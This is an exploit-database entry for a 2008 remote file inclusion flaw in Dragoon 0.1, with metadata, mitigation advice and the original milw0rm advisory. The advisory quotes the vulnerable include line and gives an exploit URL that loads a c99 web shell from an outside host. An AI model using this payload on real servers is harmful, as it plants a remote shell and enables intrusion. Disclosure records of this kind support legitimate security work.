Dragoon 0.1 Remote File Include Vulnerability

vendor:

Dragoon 0.1

by:

RoMaNcYxHaCkEr

8.8

CVSS

HIGH

Remote File Include

CWE

Product Name: Dragoon 0.1

Affected Version From: Dragoon 0.1

Affected Version To: Dragoon 0.1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Dragoon 0.1 Remote File Include Vulnerability

Dragoon 0.1 is vulnerable to a remote file include vulnerability. The vulnerable code is located in the header.inc.php file in line 23. The exploit is to send a malicious URL to the vulnerable file, such as http://WwW.4RxH.CoM/PHP/includes/header.inc.php?root=http://rxh.freehostia.com/shells/c99in.txt?

Mitigation:

Ensure that all user input is properly sanitized and validated before being used in any file include operations.

Source

Exploit-DB raw data:

-==========================================[ ViVa YeMeN ]====================================-

# Name : Dragoon 0.1 Remote File Include Vulnerabilitiy

# Download From : http://sourceforge.net/project/showfiles.php?group_id=118780

# Found By : RoMaNcYxHaCkEr     [RoMaNTiC-TeaM]  ( BlackxHat , BlackBox , aLwHEeD )        

# Home Page :  WwW.4RxH.CoM   

+======================================================================================================================+

# Vulne Code In File header.inc.php In Line 23 :

@include($root.'config.php')){

# Exploit :

http://WwW.4RxH.CoM/PHP/includes/header.inc.php?root=http://rxh.freehostia.com/shells/c99in.txt?

That,s It,s

Good Luck Everybody

+=======================================================================================================================+

# Greet To :

Tryag TeaM & All Members Of My Forum

# For Contact : RxH@HoTMaiL.iT

# Fuck Own Life  :( 

-==========================================[ ViVa YeMeN ]====================================-

# milw0rm.com [2008-04-07]